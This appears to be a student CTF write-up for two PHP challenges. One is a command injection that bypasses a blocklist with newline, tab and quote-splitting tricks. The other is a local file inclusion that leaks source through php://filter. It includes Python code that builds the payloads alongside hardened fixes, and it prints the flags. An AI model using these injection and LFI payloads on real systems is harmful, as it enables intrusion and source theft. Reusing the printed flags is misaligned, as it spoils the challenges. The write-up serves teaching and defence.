wk10 - PHP

Theme: web exploit, local file inclusion, image uploads

ping (100)

Solve

User input is read from a POST variable called ip and passed to PHP's shell_exec(), which runs a string as a shell command and returns its output as a string. Trying a few inputs, we find that &, |, ; and the space character are rejected, so the usual separators can't be used to chain a second command. A little research turns up other separators the shell accepts, such as the newline character, which is %0A when URL-encoded.

Enter this: 127.0.0.1%0Als

The directory listing in the output contains a PHP flag file. Requesting it in the browser at offsec-chalbroker.osiris.cyber.nyu.edu:1503/f14g_cmdi.php runs that file, and the flag is rendered on the page.

An alternative is to inject a command that prints the flag file directly. cat is on the blocklist, but the filter is a substring match on the raw input, while the shell strips quotes before it runs the command, so c'a't passes the filter and still executes as cat. Spaces are banned too, so a tab (%09) separates the command from its argument: 127.0.0.1%0Ac'a't%09f14g_cmdi.php
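The filter and its bypass, as an added Python model that is not part of the original writeup: the blocklist is reconstructed from the observations above (the exact server-side list is an assumption), build_payload applies the newline and tab tricks and splits banned words with quotes, shell_sees shows what a POSIX shell would actually execute, and hardened_ping_argv is the fix a developer should have written instead.

```python
import ipaddress
import shlex
from typing import List
from urllib.parse import quote

# Filter model reconstructed from what the writeup observed: &, |, ; and space are
# rejected, and so is "cat". The real server-side list is an assumption.
BLOCKED_CHARS = {"&", "|", ";", " "}
BLOCKED_WORDS = {"cat"}


def is_blocked(raw: str) -> bool:
    """Blocklist check as the challenge appears to do it: a substring match on
    the raw, decoded input. It never looks at what the shell will actually see."""
    if any(ch in raw for ch in BLOCKED_CHARS):
        return True
    return any(word in raw for word in BLOCKED_WORDS)


def split_word(word: str) -> str:
    """Quote the inner letters of a banned word so a substring match misses it,
    e.g. cat -> c'a't. The shell strips the quotes before executing, so the
    command that runs is still cat. Words shorter than three letters are left as-is."""
    if len(word) < 3:
        return word
    return word[0] + "".join(f"'{ch}'" for ch in word[1:-1]) + word[-1]


def build_payload(ip: str, cmd: str) -> str:
    """Append cmd to the pinged IP. A newline separates the two commands (the
    shell treats it like ;) and tabs replace the banned spaces between arguments."""
    argv = [split_word(a) if a in BLOCKED_WORDS else a for a in cmd.split()]
    return ip + "\n" + "\t".join(argv)


def encode_for_post(payload: str) -> str:
    """URL-encode the payload for the ip form field: newline -> %0A, tab -> %09."""
    return quote(payload, safe="")


def shell_sees(payload: str) -> List[List[str]]:
    """Tokenise each line the way a POSIX shell would (quotes removed, tab is a
    separator): one argv per command, which is what actually runs."""
    return [shlex.split(line) for line in payload.split("\n")]


def hardened_ping_argv(user_ip: str) -> List[str]:
    """The fix: parse the input as an IP address (anything else raises
    ValueError) and pass it as its own argv element, so no shell is involved.
    In PHP, validate the same way and at the very least wrap it in escapeshellarg()."""
    addr = ipaddress.ip_address(user_ip.strip())
    return ["ping", "-c", "1", str(addr)]


if __name__ == "__main__":
    payload = build_payload("127.0.0.1", "cat f14g_cmdi.php")
    print("blocked by filter:", is_blocked(payload))
    print("ip= field:", encode_for_post(payload))
    print("shell runs:", shell_sees(payload))
```

The point of the model is the mismatch it makes visible: the filter inspects the raw string, the shell inspects the tokenised one, and every trick above lives in the gap between the two. Validation that parses the input into the type the command needs (an IP address) and a no-shell exec path close that gap; extending the blocklist does not.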

Flag

flag{now_you_have_command_to_my_army_snow!_e3a163e4db83ffaf}

LFI: local file inclusion (100)

Solve

This is a news website. The URL carries a query-string parameter page, set to whatever page we are viewing, and the page is generated by executing the PHP file named by that parameter. Let's try messing around with the parameter, setting it to something like "random". We receive:

**Warning**: require_once(random.php): failed to open stream: No such file or directory in **/var/www/html/index.php** on line **32**  
  
**Fatal error**: require_once(): Failed opening required 'random.php' (include_path='.:/usr/local/lib/php') in **/var/www/html/index.php** on line **32**

This tells us the server appends .php to the value of page and hands the result to require_once(), so the desired file name should be entered without .php. The error also leaks the web root (/var/www/html) and the include path.

Let's try page=flag to see whether there's a flag file. We get the output "Can you find the flag?", so the file exists, but the flag isn't in the rendered output. It'll be helpful to leak the source of flag.php instead. PHP's php://filter stream wrapper does that: a conversion filter such as convert.base64-encode is applied to the file's contents as they are read, before require_once() gets to run them, and because the base64 text contains no <?php tag, PHP simply prints it.

Enter the following URL: http://offsec-chalbroker.osiris.cyber.nyu.edu:1500/index.php?page=php://filter/convert.base64-encode/resource=flag

We will get the source code of flag.php, base64-encoded: PD9waHAKLy9mbGFne1cwd19MRklfMXNfQzBPbCFfMmMyMmM0MTVkMmU3OTk3Zn0KPz4KQ2FuIHlvdSBmaW5kIHRoZSBmbGFnPw==

Let's decode this string in the terminal using echo "PD9waHAKLy9mbGFne1cwd19MRklfMXNfQzBPbCFfMmMyMmM0MTVkMmU3OTk3Zn0KPz4KQ2FuIHlvdSBmaW5kIHRoZSBmbGFnPw==" | base64 -d

The output is:

<?php
//flag{W0w_LFI_1s_C0Ol!_2c22c415d2e7997f}
?>
Can you find the flag?

There's the flag, hiding in a PHP comment, which is why the rendered page only ever showed the text after the closing tag.
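The whole LFI chain in one place, as an added Python example that is not part of the original writeup: filter_url builds the php://filter URL used above, vulnerable_resolve shows the concatenation the error message revealed (and why the resource is given without .php), decode_leak and find_flag recover the flag from the base64 body the page obtained, and hardened_resolve is the allowlist the site should have used. The page names other than flag in ALLOWED_PAGES are assumptions.

```python
import base64
import re
from typing import Optional
from urllib.parse import urlencode

BASE = "http://offsec-chalbroker.osiris.cyber.nyu.edu:1500/index.php"

# Base64 body the filter URL returned, copied from the writeup above.
LEAK_B64 = ("PD9waHAKLy9mbGFne1cwd19MRklfMXNfQzBPbCFfMmMyMmM0MTVkMmU3OTk3Zn0KPz4K"
            "Q2FuIHlvdSBmaW5kIHRoZSBmbGFnPw==")

# Assumed page names; the writeup only confirms that flag.php exists.
ALLOWED_PAGES = {"home": "home.php", "news": "news.php", "flag": "flag.php"}


def vulnerable_resolve(page: str) -> str:
    """What the error message shows the server doing: require_once($page . '.php').
    Any string the user supplies, wrappers included, becomes the include target."""
    return page + ".php"


def filter_url(resource: str) -> str:
    """Wrap the target in php://filter so require_once() reads its source through
    convert.base64-encode; the result has no <?php tag, so PHP prints it instead of
    executing it. resource is given without .php because the server appends it."""
    target = f"php://filter/convert.base64-encode/resource={resource}"
    return BASE + "?" + urlencode({"page": target}, safe="/:=")


def decode_leak(body: str) -> str:
    """Turn the base64 page body back into the original PHP source."""
    return base64.b64decode(body.strip()).decode()


FLAG_RE = re.compile(r"flag\{[^}]*\}")


def find_flag(source: str) -> Optional[str]:
    """Pull the flag out of the source wherever it sits (here, inside a // comment)."""
    match = FLAG_RE.search(source)
    return match.group(0) if match else None


def hardened_resolve(page: str) -> str:
    """The fix: look the parameter up in a fixed allowlist instead of building a
    filename from it. Stream wrappers, ../ traversal and unknown names all fail."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"unknown page: {page!r}")
    return ALLOWED_PAGES[page]


if __name__ == "__main__":
    print(filter_url("flag"))
    source = decode_leak(LEAK_B64)
    print(source)
    print("flag:", find_flag(source))
```

Running the block prints the filter URL, the recovered flag.php source and the flag. The allowlist in hardened_resolve is the important part: there is no way to sanitise a user-controlled include path reliably, because the php:// wrappers, traversal and null-byte tricks all bypass blocklists, whereas a dictionary lookup admits only the values you wrote down.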

Flag

flag{W0w_LFI_1s_C0Ol!_2c22c415d2e7997f}
